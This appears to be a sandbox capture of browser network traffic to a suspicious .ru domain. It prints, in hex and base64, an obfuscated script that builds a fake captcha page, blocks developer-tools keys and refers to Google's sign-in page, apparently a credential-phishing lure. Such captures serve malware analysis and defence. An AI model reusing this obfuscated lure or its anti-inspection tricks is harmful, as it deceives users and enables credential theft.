                                                                                                                                                                                    Jan 9, 2025 15:30:08.174688101 CET1.1.1.1192.168.2.40x9979No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.175107002 CET1.1.1.1192.168.2.40x8015No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.175107002 CET1.1.1.1192.168.2.40x8015No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.175276041 CET1.1.1.1192.168.2.40xb5c8No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.315620899 CET1.1.1.1192.168.2.40x9f84No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.315620899 CET1.1.1.1192.168.2.40x9f84No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.316144943 CET1.1.1.1192.168.2.40x21aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                    2025-01-09 14:30:10 UTC172.64.41.3192.168.2.40x0No error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)true
                                                                                                                                                                                    2025-01-09 14:30:10 UTC172.64.41.3192.168.2.40x0No error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)true
                                                                                                                                                                                    2025-01-09 14:30:11 UTC172.64.41.3192.168.2.40x0No error (0)shed.dual-low.s-part-0012.t-0009.t-msedge.nets-part-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)true
                                                                                                                                                                                    2025-01-09 14:30:11 UTC172.64.41.3192.168.2.40x0No error (0)s-part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)true
                                                                                                                                                                                    • bryf.atchirlisc.ru
                                                                                                                                                                                    • https:
                                                                                                                                                                                      • code.jquery.com
                                                                                                                                                                                    • a.nel.cloudflare.com
                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.449744104.21.80.14435664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:29:41 UTC670OUTGET /EeMAGvIe/ HTTP/1.1
                                                                                                                                                                                    Host: bryf.atchirlisc.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1257INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:29:42 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8uH1nTw7l7qs99POpqTrGQtlDMbmpk9plZXRrtt%2FtFAT6F1AQQxcL%2FFctdVYSFBwpEWHRRi0%2Fa6G%2BombcNMO1C%2Bqs%2BSY2AO7EqpSoy56jCvp7CyKzrVt86xbQNT2eg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=73091&min_rtt=72913&rtt_var=41&sent=309&recv=159&lost=0&retrans=0&sent_bytes=315536&recv_bytes=9554&delivery_rate=416046&cwnd=233&unsent_bytes=0&cid=03947a6ab2869827&ts=321241&x=0"
                                                                                                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IlBhWmpGMDVWZ01jS0xzWm9RVGJ1VkE9PSIsInZhbHVlIjoia1BUemJwcVdBTWdYaURwRGxueFlaZ3FlM3QvalNpcnk2REFqbmVvbTFsbEZnNzl5Y0plbW9CQTNVZGZLQmw0aXZoUEQvVEt2ejZrWVMxUlpRWUVwWks2dzRwR2QvSDNLYU94MHJqdXlDYld6VWdsYW5Pa0NWOE1vQUx2WmxmZWgiLCJtYWMiOiIyZGY1YWNlMTg4Mzk3ODliNTUxMDZiNTA4ODM3YmMxNDcwM2ZhZGIwYzVmZTQ3ODE4ODU2OTYyZTQ4YjRlMmIyIiwidGFnIjoiIn0%3D; expires=Thu, 09-Jan-2025 16:29:42 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                    2025-01-09 14:29:42 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 77 76 53 55 39 44 56 55 67 76 53 6d 4d 30 62 44 4e 4b 54 31 46 54 57 58 4a 34 51 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 30 55 76 57 6b 46 70 4f 45 70 47 4d 44 63 72 4d 30 70 6d 61 79 39 73 55 45 68 6a 4f 58 64 34 62 30 46 34 4f 55 4e 42 62 6d 68 72 55 45 46 4a 52 69 39 36 4b 33 4a 45 55 33 68 61 56 47 4e 5a 51 57 4a 50 55 44 68 73 65 58 52 48 59 7a 56 45 55 6e 46 6d 53 6e 56 4c 54 58 6c 36 57 45 4e 45 4e 6c 68 69 4e 7a 4e 77 54 6a 42 49 56 57 56 6d 62 56 70 6b 61 58 70 57 64 6d 39 44 4d 45 4e 50 53 6c 42 46 61 47 5a 71 63 6a 64 73 63 6a 42 30 65 6d 35 53 4e 55 78 6b 4d 47 56 4c 62 57 6c 46 51 6d 52 31 56 33 6c 54 56 54 67
                                                                                                                                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImwvSU9DVUgvSmM0bDNKT1FTWXJ4Q1E9PSIsInZhbHVlIjoiT0UvWkFpOEpGMDcrM0pmay9sUEhjOXd4b0F4OUNBbmhrUEFJRi96K3JEU3haVGNZQWJPUDhseXRHYzVEUnFmSnVLTXl6WENENlhiNzNwTjBIVWVmbVpkaXpWdm9DMENPSlBFaGZqcjdscjB0em5SNUxkMGVLbWlFQmR1V3lTVTg
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 31 37 34 63 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 68 6f 77 20 68 69 67 68 20 79 6f 75 20 68 61 76 65 20 63 6c 69 6d 62 65 64 2c 20 62 75 74 20 68 6f 77 20 79 6f 75 20 6d 61 6b 65 20 61 20 70 6f 73 69 74 69 76 65 20 64 69 66 66 65 72 65 6e 63 65 20 74 6f 20 74 68 65 20 77 6f 72 6c 64 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 43 63 6c 6c 47 4c 6d 46 30 59 32 68 70 63 6d 78 70 63 32 4d 75 63 6e 55 76 52 57 56 4e 51 55 64 32 53 57 55 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47
                                                                                                                                                                                    Data Ascii: 174c<script>/* Success is not how high you have climbed, but how you make a positive difference to the world. */if(atob("aHR0cHM6Ly9CcllGLmF0Y2hpcmxpc2MucnUvRWVNQUd2SWUv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIG
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 77 30 4b 49 43 41 67 49 48 6f 74 61 57 35 6b 5a 58 67 36 49 44 45 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73
                                                                                                                                                                                    Data Ascii: b246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjs
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 57 39 75 4f 69 42 79 5a 57 78 68 64 47 6c 32 5a 54 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 69 62 33 67 67 61 57 35 77 64 58 52 62 64 48 6c 77 5a 54 30 69 59 32 68 6c 59 32 74 69 62 33 67 69 58 54 70 6a 61 47 56 6a 61 32 56 6b 49 43 73 67 62 47 46 69 5a 57 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67
                                                                                                                                                                                    Data Ascii: W9uOiByZWxhdGl2ZTsNCn0NCg0KLmNhcHRjaGEtY2hlY2tib3ggaW5wdXRbdHlwZT0iY2hlY2tib3giXTpjaGVja2VkICsgbGFiZWwgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDog
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 62 6d 39 75 5a 54 73 4e 43 69 41 67 49 43 42 6d 62 47 56 34 4c 57 52 70 63 6d 56 6a 64 47 6c 76 62 6a 6f 67 59 32 39 73 64 57 31 75 4f 77 30 4b 49 43 41 67 49 47 46 73 61 57 64 75 4c 57 6c 30 5a 57 31 7a 4f 69 42 6a 5a 57 35 30 5a 58 49 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44
                                                                                                                                                                                    Data Ascii: B7DQogICAgZGlzcGxheTogbm9uZTsNCiAgICBmbGV4LWRpcmVjdGlvbjogY29sdW1uOw0KICAgIGFsaWduLWl0ZW1zOiBjZW50ZXI7DQogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7D
                                                                                                                                                                                    2025-01-09 14:29:42 UTC496INData Raw: 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57
                                                                                                                                                                                    Data Ascii: pKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYW
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 37 66 66 61 0d 0a 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 6a 63 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 63 30 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47
                                                                                                                                                                                    Data Ascii: 7ffa2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKG
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 64 48 52 77 63 7a 6f 76 4c 32 46 6a 59 32 39 31 62 6e 52 7a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 76 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4c 43 41 78 4d 44 41 70 4f 77 30 4b 66 53 6b 6f 4b 54 73 4e 43 6a 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 39 6f 5a 57 46 6b 50 67 30 4b 50 47 4a 76 5a 48 6b 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 38 5a 47 6c 32 49 47 4e 73 59 58 4e 7a 50 53 4a 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 49 6a 34 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6d 4e 76 62 6e 52 68 61 57 35 6c 63 69 49 2b 44 51 6f 67 49 43 41 67 50 47 52
                                                                                                                                                                                    Data Ascii: dHRwczovL2FjY291bnRzLmdvb2dsZS5jb20vJyk7DQogICAgICAgIH0NCiAgICB9LCAxMDApOw0KfSkoKTsNCjwvc2NyaXB0Pg0KPC9oZWFkPg0KPGJvZHk+DQo8ZGl2IGNsYXNzPSJiYWNrZ3JvdW5kLWNvbnRhaW5lciI+DQo8ZGl2IGNsYXNzPSJiYWNrZ3JvdW5kIj48L2Rpdj4NCjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+DQogICAgPGR
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 6d 30 33 51 6b 31 52 5a 30 6c 50 64 45 56 4f 5a 44 6c 42 54 55 39 30 51 30 35 6c 63 45 52 4f 5a 57 52 4a 54 55 31 52 61 6b 67 72 63 45 52 4f 5a 57 68 44 54 69 73 78 52 45 35 6c 64 45 52 4f 54 55 31 72 53 55 31 52 61 55 6c 51 61 54 64 43 59 30 31 70 53 48 5a 74 4e 30 4a 50 61 45 4e 4f 54 33 42 44 54 6d 56 77 51 30 35 50 61 45 56 4f 54 32 52 42 54 30 39 73 51 30 35 6c 4f 55 46 4e 54 33 42 45 54 53 74 6f 52 45 35 6b 4f 55 46 52 52 55 64 47 4f 55 56 4c 52 6a 6c 45 54 32 39 56 4d 45 74 46 4f 48 70 54 62 31 55 77 52 30 51 34 65 6b 39 74 56 56 56 4c 52 6a 68 71 54 33 42 56 4d 45 4e 42 4e 33 70 44 62 6c 56 46 52 30 59 35 52 46 4e 77 56 57 74 4c 52 44 68 36 54 32 39 56 65 6c 4e 75 56 6b 56 48 52 6a 6c 46 51 30 67 33 65 6b 39 76 56 54 42 44 52 6a 68 71 56 32 35 56
                                                                                                                                                                                    Data Ascii: m03Qk1RZ0lPdEVOZDlBTU90Q05lcEROZWRJTU1RakgrcEROZWhDTisxRE5ldEROTU1rSU1RaUlQaTdCY01pSHZtN0JPaENOT3BDTmVwQ05PaEVOT2RBT09sQ05lOUFNT3BETStoRE5kOUFRRUdGOUVLRjlET29VMEtFOHpTb1UwR0Q4ek9tVVVLRjhqT3BVMENBN3pDblVFR0Y5RFNwVWtLRDh6T29VelNuVkVHRjlFQ0g3ek9vVTBDRjhqV25V
                                                                                                                                                                                    2025-01-09 14:29:42 UTC1369INData Raw: 68 36 5a 45 52 50 5a 6e 6c 7a 64 6a 52 72 5a 6c 4d 7a 63 33 41 31 5a 57 5a 51 5a 47 68 71 53 7a 51 79 5a 54 45 32 4d 6d 77 76 53 43 39 6f 55 79 39 32 4d 6e 4a 61 55 32 6c 69 62 6a 6c 58 4b 32 35 51 54 46 64 57 4d 46 51 7a 63 6a 56 50 61 47 5a 49 4e 31 64 54 4c 32 70 79 5a 30 46 54 5a 31 64 6f 62 56 4d 34 54 46 41 72 52 32 39 6f 53 45 74 51 62 32 5a 6e 53 6e 42 6f 55 30 31 71 55 47 46 76 4c 30 68 32 63 47 49 76 52 54 46 44 64 45 52 4a 62 6a 56 54 5a 6e 4e 4a 65 55 77 32 51 6b 73 79 55 6b 6c 36 61 79 39 54 55 6a 42 45 62 6b 45 78 51 56 42 52 65 58 49 34 63 45 68 33 52 58 42 45 4f 45 4e 57 59 32 46 52 52 47 6f 34 63 45 68 33 53 48 68 71 4d 45 4a 57 54 57 46 55 52 6e 6f 7a 53 55 68 4e 55 7a 6b 72 56 6d 5a 49 4b 7a 67 7a 4d 33 52 6f 64 6d 4e 4b 53 6d 4a 32 65
                                                                                                                                                                                    Data Ascii: h6ZERPZnlzdjRrZlMzc3A1ZWZQZGhqSzQyZTE2MmwvSC9oUy92MnJaU2libjlXK25QTFdWMFQzcjVPaGZIN1dTL2pyZ0FTZ1dobVM4TFArR29oSEtQb2ZnSnBoU01qUGFvL0h2cGIvRTFDdERJbjVTZnNJeUw2QksyUkl6ay9TUjBEbkExQVBReXI4cEh3RXBEOENWY2FRRGo4cEh3SHhqMEJWTWFURnozSUhNUzkrVmZIKzgzM3RodmNKSmJ2e


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.449745151.101.130.1374435664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:29:43 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bryf.atchirlisc.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2025-01-09 14:29:43 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 89501
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Age: 1917509
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:29:43 GMT
                                                                                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740032-EWR
                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                    X-Cache-Hits: 2774, 0
                                                                                                                                                                                    X-Timer: S1736432983.354261,VS0,VE1
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    2025-01-09 14:29:43 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                    2025-01-09 14:29:43 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
